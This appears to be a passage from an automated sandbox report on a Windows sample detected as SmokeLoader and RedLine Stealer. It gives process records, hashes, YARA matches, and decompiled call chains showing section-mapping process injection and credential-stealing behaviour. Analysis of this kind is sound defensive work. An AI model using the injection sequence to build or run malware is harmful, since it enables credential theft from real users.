                              Data Ascii: $uXX p]BAd@d.=K f<b4+"y*OCU^x`M>b8D0c<k%cV^&UfUIs#uDEECE=zhU6g{p0)}d@EE2MvoJ4gKHF`I9VAf&


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:00:15:50
                              Start date:06/07/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x400000
                              File size:236'032 bytes
                              MD5 hash:0FC784B6C538E7C4A5A4F4BCD8068859
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:00:15:59
                              Start date:06/07/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff72b770000
                              File size:5'141'208 bytes
                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:00:16:18
                              Start date:06/07/2024
                              Path:C:\Users\user\AppData\Roaming\crwjtgt
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\crwjtgt
                              Imagebase:0x400000
                              File size:236'032 bytes
                              MD5 hash:0FC784B6C538E7C4A5A4F4BCD8068859
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2006696706.0000000002882000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2006818821.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:6
                              Start time:00:16:36
                              Start date:06/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\8FDD.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\8FDD.exe
                              Imagebase:0x850000
                              File size:6'642'176 bytes
                              MD5 hash:BD2EAC64CBDED877608468D86786594A
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2115559211.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2117148403.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2163676907.0000000001971000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2116192738.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2115670652.0000000001977000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2131042484.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, ReversingLabs
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:10
                              Start time:00:17:08
                              Start date:06/07/2024
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 7124
                              Imagebase:0x7ff6cdc00000
                              File size:570'736 bytes
                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:00:17:11
                              Start date:06/07/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:explorer.exe
                              Imagebase:0x7ff72b770000
                              File size:5'141'208 bytes
                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:7.7%
                                Dynamic/Decrypted Code Coverage:29.3%
                                Signature Coverage:64.6%
                                Total number of Nodes:99
                                Total number of Limit Nodes:2
                                execution_graph 3730 401543 3740 401546 3730->3740 3731 4015e6 NtDuplicateObject 3732 401603 NtCreateSection 3731->3732 3741 401702 3731->3741 3733 401683 NtCreateSection 3732->3733 3734 401629 NtMapViewOfSection 3732->3734 3735 4016af 3733->3735 3733->3741 3734->3733 3736 40164c NtMapViewOfSection 3734->3736 3737 4016b9 NtMapViewOfSection 3735->3737 3735->3741 3736->3733 3738 40166a 3736->3738 3739 4016e0 NtMapViewOfSection 3737->3739 3737->3741 3738->3733 3739->3741 3740->3731 3740->3741 3796 402e63 3797 402e67 3796->3797 3798 402f44 3797->3798 3799 401918 8 API calls 3797->3799 3799->3798 3790 401924 3791 401929 3790->3791 3792 40195e Sleep 3791->3792 3793 401979 3792->3793 3794 401538 7 API calls 3793->3794 3795 40198a 3793->3795 3794->3795 3637 29a003c 3638 29a0049 3637->3638 3650 29a0e0f SetErrorMode SetErrorMode 3638->3650 3643 29a0265 3644 29a02ce VirtualProtect 3643->3644 3646 29a030b 3644->3646 3645 29a0439 VirtualFree 3648 29a04be LoadLibraryA 3645->3648 3646->3645 3649 29a08c7 3648->3649 3651 29a0223 3650->3651 3652 29a0d90 3651->3652 3653 29a0dad 3652->3653 3654 29a0dbb GetPEB 3653->3654 3655 29a0238 VirtualAlloc 3653->3655 3654->3655 3655->3643 3678 402fe9 3679 403140 3678->3679 3680 403013 3678->3680 3680->3679 3681 4030ce RtlCreateUserThread NtTerminateProcess 3680->3681 3681->3679 3682 2ba9136 3685 2ba913d 3682->3685 3686 2ba914c 3685->3686 3689 2ba98dd 3686->3689 3691 2ba98f8 3689->3691 3690 2ba9901 CreateToolhelp32Snapshot 3690->3691 3692 2ba991d Module32First 3690->3692 3691->3690 3691->3692 3693 2ba992c 3692->3693 3694 2ba913c 3692->3694 3696 2ba959c 3693->3696 3697 2ba95c7 3696->3697 3698 2ba95d8 VirtualAlloc 3697->3698 3699 2ba9610 3697->3699 3698->3699 3699->3699 3808 29a092b GetPEB 3809 29a0972 3808->3809 3712 401496 3713 401447 3712->3713 3713->3712 3714 4015e6 NtDuplicateObject 3713->3714 3721 40152f 3713->3721 3715 401603 NtCreateSection 3714->3715 3714->3721 3716 401683 NtCreateSection 3715->3716 3717 401629 NtMapViewOfSection 3715->3717 3718 4016af 3716->3718 3716->3721 3717->3716 3719 40164c NtMapViewOfSection 3717->3719 3720 4016b9 NtMapViewOfSection 3718->3720 3718->3721 3719->3716 3722 40166a 3719->3722 3720->3721 3723 4016e0 NtMapViewOfSection 3720->3723 3722->3716 3723->3721 3656 402eb7 3657 402eb8 3656->3657 3659 402f44 3657->3659 3660 401918 3657->3660 3661 401929 3660->3661 3662 40195e Sleep 3661->3662 3663 401979 3662->3663 3665 40198a 3663->3665 3666 401538 3663->3666 3665->3659 3667 401539 3666->3667 3668 4015e6 NtDuplicateObject 3667->3668 3677 401702 3667->3677 3669 401603 NtCreateSection 3668->3669 3668->3677 3670 401683 NtCreateSection 3669->3670 3671 401629 NtMapViewOfSection 3669->3671 3672 4016af 3670->3672 3670->3677 3671->3670 3673 40164c NtMapViewOfSection 3671->3673 3674 4016b9 NtMapViewOfSection 3672->3674 3672->3677 3673->3670 3675 40166a 3673->3675 3676 4016e0 NtMapViewOfSection 3674->3676 3674->3677 3675->3670 3676->3677 3677->3665 3700 4014de 3701 401447 3700->3701 3702 4015e6 NtDuplicateObject 3701->3702 3709 40152f 3701->3709 3703 401603 NtCreateSection 3702->3703 3702->3709 3704 401683 NtCreateSection 3703->3704 3705 401629 NtMapViewOfSection 3703->3705 3706 4016af 3704->3706 3704->3709 3705->3704 3707 40164c NtMapViewOfSection 3705->3707 3708 4016b9 NtMapViewOfSection 3706->3708 3706->3709 3707->3704 3710 40166a 3707->3710 3708->3709 3711 4016e0 NtMapViewOfSection 3708->3711 3710->3704 3711->3709

                                Executed Functions

                                Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 85 401496-4014a5 86 4014a7 85->86 87 40151b-40152d 85->87 89 4014a9-4014b5 86->89 90 4014cf 86->90 95 4014ba 87->95 96 40152f-401535 87->96 92 401471-401472 89->92 93 4014b7-4014b8 89->93 94 4014d6 90->94 98 401473-401484 92->98 93->95 97 401449 93->97 94->94 99 4014d8 94->99 103 401447-401456 95->103 104 4014bc-4014c3 95->104 101 40147b-40148e call 4011b7 97->101 102 40144b 97->102 98->101 99->87 101->85 107 40144c-401470 102->107 103->107 108 4014c5-4014c8 104->108 109 401539-401567 104->109 107->98 108->90 119 401558-401563 109->119 120 40156a-401590 call 4011b7 109->120 119->120 127 401592 120->127 128 401595-40159a 120->128 127->128 130 4015a0-4015b1 128->130 131 4018b8-4018c0 128->131 135 4018b6-4018c5 130->135 136 4015b7-4015e0 130->136 131->128 139 4018da 135->139 140 4018cb-4018d6 135->140 136->135 145 4015e6-4015fd NtDuplicateObject 136->145 139->140 141 4018dd-401915 call 4011b7 139->141 140->141 145->135 147 401603-401627 NtCreateSection 145->147 149 401683-4016a9 NtCreateSection 147->149 150 401629-40164a NtMapViewOfSection 147->150 149->135 151 4016af-4016b3 149->151 150->149 153 40164c-401668 NtMapViewOfSection 150->153 151->135 154 4016b9-4016da NtMapViewOfSection 151->154 153->149 156 40166a-401680 153->156 154->135 157 4016e0-4016fc NtMapViewOfSection 154->157 156->149 157->135 160 401702 call 401707 157->160
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 163 401538-401567 169 401558-401563 163->169 170 40156a-401590 call 4011b7 163->170 169->170 177 401592 170->177 178 401595-40159a 170->178 177->178 180 4015a0-4015b1 178->180 181 4018b8-4018c0 178->181 185 4018b6-4018c5 180->185 186 4015b7-4015e0 180->186 181->178 189 4018da 185->189 190 4018cb-4018d6 185->190 186->185 195 4015e6-4015fd NtDuplicateObject 186->195 189->190 191 4018dd-401915 call 4011b7 189->191 190->191 195->185 197 401603-401627 NtCreateSection 195->197 199 401683-4016a9 NtCreateSection 197->199 200 401629-40164a NtMapViewOfSection 197->200 199->185 201 4016af-4016b3 199->201 200->199 203 40164c-401668 NtMapViewOfSection 200->203 201->185 204 4016b9-4016da NtMapViewOfSection 201->204 203->199 206 40166a-401680 203->206 204->185 207 4016e0-4016fc NtMapViewOfSection 204->207 206->199 207->185 210 401702 call 401707 207->210
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 213 4014de-4014ed 214 401563 213->214 215 4014ef 213->215 218 40156a-401590 call 4011b7 214->218 216 401551-401552 215->216 217 4014f1-401502 215->217 216->214 219 401504-401516 217->219 220 40151d-40152d 217->220 238 401592 218->238 239 401595-40159a 218->239 222 40151b-40151c 219->222 225 4014ba 220->225 226 40152f-401535 220->226 222->220 228 401447-401456 225->228 229 4014bc-4014c3 225->229 236 40144c-401470 228->236 232 4014c5-4014c8 229->232 233 401539-401567 229->233 237 4014cf 232->237 233->218 251 401558-401560 233->251 252 401473-401484 236->252 242 4014d6 237->242 238->239 247 4015a0-4015b1 239->247 248 4018b8-4018c0 239->248 242->242 246 4014d8 242->246 246->222 259 4018b6-4018c5 247->259 260 4015b7-4015e0 247->260 248->239 251->214 256 40147b-4014a5 call 4011b7 252->256 256->222 270 4014a7 256->270 265 4018da 259->265 266 4018cb-4018d6 259->266 260->259 274 4015e6-4015fd NtDuplicateObject 260->274 265->266 267 4018dd-401915 call 4011b7 265->267 266->267 270->237 273 4014a9-4014b5 270->273 276 401471-401472 273->276 277 4014b7-4014b8 273->277 274->259 278 401603-401627 NtCreateSection 274->278 276->252 277->225 280 401449 277->280 281 401683-4016a9 NtCreateSection 278->281 282 401629-40164a NtMapViewOfSection 278->282 280->256 284 40144b 280->284 281->259 283 4016af-4016b3 281->283 282->281 286 40164c-401668 NtMapViewOfSection 282->286 283->259 287 4016b9-4016da NtMapViewOfSection 283->287 284->236 286->281 289 40166a-401680 286->289 287->259 290 4016e0-4016fc NtMapViewOfSection 287->290 289->281 290->259 293 401702 call 401707 290->293
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 296 401543-401544 297 401546-401567 296->297 298 4015af-4015b1 296->298 305 401558-401563 297->305 306 40156a-401590 call 4011b7 297->306 299 4018b6-4018c5 298->299 300 4015b7-4015e0 298->300 307 4018da 299->307 308 4018cb-4018d6 299->308 300->299 317 4015e6-4015fd NtDuplicateObject 300->317 305->306 327 401592 306->327 328 401595-40159a 306->328 307->308 309 4018dd-401915 call 4011b7 307->309 308->309 317->299 320 401603-401627 NtCreateSection 317->320 323 401683-4016a9 NtCreateSection 320->323 324 401629-40164a NtMapViewOfSection 320->324 323->299 325 4016af-4016b3 323->325 324->323 329 40164c-401668 NtMapViewOfSection 324->329 325->299 330 4016b9-4016da NtMapViewOfSection 325->330 327->328 337 4015a0-4015ad 328->337 338 4018b8-4018c0 328->338 329->323 332 40166a-401680 329->332 330->299 334 4016e0-4016fc NtMapViewOfSection 330->334 332->323 334->299 339 401702 call 401707 334->339 337->298 338->328
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 344 401565-401590 call 4011b7 349 401592 344->349 350 401595-40159a 344->350 349->350 352 4015a0-4015b1 350->352 353 4018b8-4018c0 350->353 357 4018b6-4018c5 352->357 358 4015b7-4015e0 352->358 353->350 361 4018da 357->361 362 4018cb-4018d6 357->362 358->357 367 4015e6-4015fd NtDuplicateObject 358->367 361->362 363 4018dd-401915 call 4011b7 361->363 362->363 367->357 369 401603-401627 NtCreateSection 367->369 371 401683-4016a9 NtCreateSection 369->371 372 401629-40164a NtMapViewOfSection 369->372 371->357 373 4016af-4016b3 371->373 372->371 375 40164c-401668 NtMapViewOfSection 372->375 373->357 376 4016b9-4016da NtMapViewOfSection 373->376 375->371 378 40166a-401680 375->378 376->357 379 4016e0-4016fc NtMapViewOfSection 376->379 378->371 379->357 382 401702 call 401707 379->382
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 385 401579-401590 call 4011b7 391 401592 385->391 392 401595-40159a 385->392 391->392 394 4015a0-4015b1 392->394 395 4018b8-4018c0 392->395 399 4018b6-4018c5 394->399 400 4015b7-4015e0 394->400 395->392 403 4018da 399->403 404 4018cb-4018d6 399->404 400->399 409 4015e6-4015fd NtDuplicateObject 400->409 403->404 405 4018dd-401915 call 4011b7 403->405 404->405 409->399 411 401603-401627 NtCreateSection 409->411 413 401683-4016a9 NtCreateSection 411->413 414 401629-40164a NtMapViewOfSection 411->414 413->399 415 4016af-4016b3 413->415 414->413 417 40164c-401668 NtMapViewOfSection 414->417 415->399 418 4016b9-4016da NtMapViewOfSection 415->418 417->413 420 40166a-401680 417->420 418->399 421 4016e0-4016fc NtMapViewOfSection 418->421 420->413 421->399 424 401702 call 401707 421->424
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 427 40157c-401590 call 4011b7 431 401592 427->431 432 401595-40159a 427->432 431->432 434 4015a0-4015b1 432->434 435 4018b8-4018c0 432->435 439 4018b6-4018c5 434->439 440 4015b7-4015e0 434->440 435->432 443 4018da 439->443 444 4018cb-4018d6 439->444 440->439 449 4015e6-4015fd NtDuplicateObject 440->449 443->444 445 4018dd-401915 call 4011b7 443->445 444->445 449->439 451 401603-401627 NtCreateSection 449->451 453 401683-4016a9 NtCreateSection 451->453 454 401629-40164a NtMapViewOfSection 451->454 453->439 455 4016af-4016b3 453->455 454->453 457 40164c-401668 NtMapViewOfSection 454->457 455->439 458 4016b9-4016da NtMapViewOfSection 455->458 457->453 460 40166a-401680 457->460 458->439 461 4016e0-4016fc NtMapViewOfSection 458->461 460->453 461->439 464 401702 call 401707 461->464
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1721477579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
